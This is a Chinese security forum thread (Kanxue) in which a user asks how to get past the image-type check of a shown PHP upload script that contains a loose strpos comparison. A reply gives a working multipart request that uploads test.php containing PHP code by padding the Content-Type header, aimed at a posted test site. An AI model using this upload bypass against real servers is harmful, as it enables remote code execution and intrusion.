关于php上传漏洞问题请教-求助问答-看雪-安全社区|安全招聘|kanxue.com

未解决关于php上传漏洞问题请教

发表于: 2021-1-16 06:49 1988

未解决关于php上传漏洞问题请教

漠北蝈蝈

2021-1-16 06:49

1988

<?php
 
 
 if(empty($_FILES['file']))
   {
       echo json_encode(['isSuccess'=>false,'msg'=>'请上传二维码']);exit;
   }
 
   $file = $_FILES["file"];
 
   if ($file["error"] > 0)
   {
       echo json_encode(['isSuccess'=>false,'msg'=>'上传图片信息错误']);exit;
 
   }
 
   if(strpos($file["type"],'image') == false)
   {
       echo json_encode(['isSuccess'=>false,'msg'=>'请上传图片']);exit;
   }
 
   $temp = explode(".", $file["name"]);
   $extension = end($temp);
 
 
   $new_path = 'upload/'.time().rand(1000,9999).'.'.$extension;
 
   if(move_uploaded_file($file["tmp_name"], $new_path))
   {
       echo json_encode(['isSuccess'=>true,'msg'=>'上传成功','file'=>$new_path]);
   }
   else
   {
       echo json_encode(['isSuccess'=>false,'msg'=>'上传失败']);exit;
   }

if(strpos($file["type"],'image') == false)
这是判断image字符串在$file['type']中第一次出现的位置
我这个php版本是0 然后0==false是成立的
可就是传不上去，我朋友非说能传上去。
daeK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3q4Y4i4K6u0W2x3h3&6B7y4Y4S2$3i4K6u0W2K9h3c8Q4x3V1k6S2k6$3g2F1N6q4)9@1x3o6V1&6x3e0j5^5z5q4)9J5c8Y4c8^5i4K6g2X3N6i4m8D9L8$3q4V1i4K6u0W2M7r3S2H3 这是测试地址
burp改包测试不行，有老哥能突破吗

[培训]科锐逆向工程师培训第53期2025年7月8日开班！

收藏・0

免费・0

支持

最新回复 (5)
kxzpy 雪币： 3496 活跃值： (749) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 262 粉丝 2 关注私信	kxzpy 2 楼 228K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8Y4f1H3x3e0t1I4y4U0p5%4x3U0k6Q4x3V1k6S2M7Y4c8A6j5$3I4W2i4K6u0r3k6r3g2@1j5h3W2D9M7#2)9J5c8U0M7^5x3o6x3^5y4K6l9$3i4K6y4r3N6i4c8E0i4K6g2X3L8h3g2V1K9i4g2E0i4K6y4p5k6r3W2K6N6s2u0A6j5Y4g2@1k6g2)9J5k6i4m8U0i4K6g2X3M7X3g2D9k6i4k6S2L8Y4c8Q4x3X3g2F1L8$3&6W2i4K6u0V1N6r3q4K6K9#2)9J5k6r3u0D9L8$3N6Q4x3X3c8T1j5h3W2V1N6h3A6K6i4K6g2X3N6r3W2@1L8r3g2Q4x3X3b7$3i4K6t1$3j5h3#2H3i4K6y4n7M7%4m8E0i4K6y4p5x3e0l9H3x3g2)9J5k6e0t1I4x3o6q4Q4x3X3f1K6x3o6l9I4i4K6u0W2y4o6t1@1x3R3`.`. 这个吗？没有前端，没法测试 2021-1-16 09:05 0
零加一雪币： 2042 活跃值： (4950) 能力值： ( LV13，RANK：278 ) 在线值：发帖 12 回帖 41 粉丝 168 关注私信	零加一 3 3 楼 c9eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3q4Y4i4K6u0W2x3h3&6B7y4Y4S2$3i4K6u0W2K9h3c8Q4x3V1k6S2k6$3g2F1N6q4)9@1x3o6V1&6x3e0j5^5z5q4)9J5c8Y4g2H3L8r3!0S2k6q4)9J5c8U0p5$3x3e0l9%4y4U0p5^5x3o6V1J5y4K6x3%4i4K6u0W2M7r3S2H3 ---------------------------acebdf13572468 Content-Disposition: form-data; name="file"; filename="test.php" Content-Type: 这里随便填充一个及以上不为空的数据防止代码中strpos返回0image/jpeg <?php phpinfo();?> ---------------------------acebdf13572468-- 2021-1-16 09:55 0
漠北蝈蝈雪币： 73 活跃值： (281) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 42 粉丝 0 关注私信	漠北蝈蝈 4 楼多谢多谢 2021-1-16 14:34 0
漠北蝈蝈雪币： 73 活跃值： (281) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 42 粉丝 0 关注私信	漠北蝈蝈 5 楼零加一 2b5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3q4Y4i4K6u0W2x3h3&6B7y4Y4S2$3i4K6u0W2K9h3c8Q4x3V1k6S2k6$3g2F1N6q4)9@1x3o6V1&6x3e0j5^5z5q4)9J5c8Y4g2H3L8r3!0S2k6q4)9J5c8U0p5$3x3e0l9%4y4U0p5^5x3o6V1J5y4K6x3%4i4K6u0W2M7r3S2H3 ---------------------------acebdf13572 ... 多谢老哥，明白了 2021-1-16 14:35 0
漠北蝈蝈雪币： 73 活跃值： (281) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 42 粉丝 0 关注私信	漠北蝈蝈 6 楼 kxzpy cb0K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8Y4f1H3x3e0t1I4y4U0p5%4x3U0k6Q4x3V1k6S2M7Y4c8A6j5$3I4W2i4K6u0r3k6r3g2@1j5h3W2D9M7#2)9J5c8U0M7^5x3o6x3^5y4K6l9$3i4K6y4r3N6i4c8E0i4K6g2X3L8h3g2V1K9i4g2E0i4K6y4p5k6r3W2K6N6s2u0A6j5Y4g2@1k6g2)9J5k6i4m8U0i4K6g2X3M7X3g2D9k6i4k6S2L8Y4c8Q4x3X3g2F1L8$3&6W2i4K6u0V1N6r3q4K6 ... 多谢老哥 2021-1-16 14:35 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

漠北蝈蝈

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (5)
kxzpy 雪币： 3496 活跃值： (749) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 262 粉丝 2 关注私信	kxzpy 2 楼 228K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8Y4f1H3x3e0t1I4y4U0p5%4x3U0k6Q4x3V1k6S2M7Y4c8A6j5$3I4W2i4K6u0r3k6r3g2@1j5h3W2D9M7#2)9J5c8U0M7^5x3o6x3^5y4K6l9$3i4K6y4r3N6i4c8E0i4K6g2X3L8h3g2V1K9i4g2E0i4K6y4p5k6r3W2K6N6s2u0A6j5Y4g2@1k6g2)9J5k6i4m8U0i4K6g2X3M7X3g2D9k6i4k6S2L8Y4c8Q4x3X3g2F1L8$3&6W2i4K6u0V1N6r3q4K6K9#2)9J5k6r3u0D9L8$3N6Q4x3X3c8T1j5h3W2V1N6h3A6K6i4K6g2X3N6r3W2@1L8r3g2Q4x3X3b7$3i4K6t1$3j5h3#2H3i4K6y4n7M7%4m8E0i4K6y4p5x3e0l9H3x3g2)9J5k6e0t1I4x3o6q4Q4x3X3f1K6x3o6l9I4i4K6u0W2y4o6t1@1x3R3`.`. 这个吗？没有前端，没法测试 2021-1-16 09:05 0
零加一雪币： 2042 活跃值： (4950) 能力值： ( LV13，RANK：278 ) 在线值：发帖 12 回帖 41 粉丝 168 关注私信	零加一 3 3 楼 c9eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3q4Y4i4K6u0W2x3h3&6B7y4Y4S2$3i4K6u0W2K9h3c8Q4x3V1k6S2k6$3g2F1N6q4)9@1x3o6V1&6x3e0j5^5z5q4)9J5c8Y4g2H3L8r3!0S2k6q4)9J5c8U0p5$3x3e0l9%4y4U0p5^5x3o6V1J5y4K6x3%4i4K6u0W2M7r3S2H3 ---------------------------acebdf13572468 Content-Disposition: form-data; name="file"; filename="test.php" Content-Type: 这里随便填充一个及以上不为空的数据防止代码中strpos返回0image/jpeg <?php phpinfo();?> ---------------------------acebdf13572468-- 2021-1-16 09:55 0
漠北蝈蝈雪币： 73 活跃值： (281) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 42 粉丝 0 关注私信	漠北蝈蝈 4 楼多谢多谢 2021-1-16 14:34 0
漠北蝈蝈雪币： 73 活跃值： (281) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 42 粉丝 0 关注私信	漠北蝈蝈 5 楼零加一 2b5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3q4Y4i4K6u0W2x3h3&6B7y4Y4S2$3i4K6u0W2K9h3c8Q4x3V1k6S2k6$3g2F1N6q4)9@1x3o6V1&6x3e0j5^5z5q4)9J5c8Y4g2H3L8r3!0S2k6q4)9J5c8U0p5$3x3e0l9%4y4U0p5^5x3o6V1J5y4K6x3%4i4K6u0W2M7r3S2H3 ---------------------------acebdf13572 ... 多谢老哥，明白了 2021-1-16 14:35 0
漠北蝈蝈雪币： 73 活跃值： (281) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 42 粉丝 0 关注私信	漠北蝈蝈 6 楼 kxzpy cb0K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8Y4f1H3x3e0t1I4y4U0p5%4x3U0k6Q4x3V1k6S2M7Y4c8A6j5$3I4W2i4K6u0r3k6r3g2@1j5h3W2D9M7#2)9J5c8U0M7^5x3o6x3^5y4K6l9$3i4K6y4r3N6i4c8E0i4K6g2X3L8h3g2V1K9i4g2E0i4K6y4p5k6r3W2K6N6s2u0A6j5Y4g2@1k6g2)9J5k6i4m8U0i4K6g2X3M7X3g2D9k6i4k6S2L8Y4c8Q4x3X3g2F1L8$3&6W2i4K6u0V1N6r3q4K6 ... 多谢老哥 2021-1-16 14:35 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

未解决 关于php上传漏洞问题请教

未解决关于php上传漏洞问题请教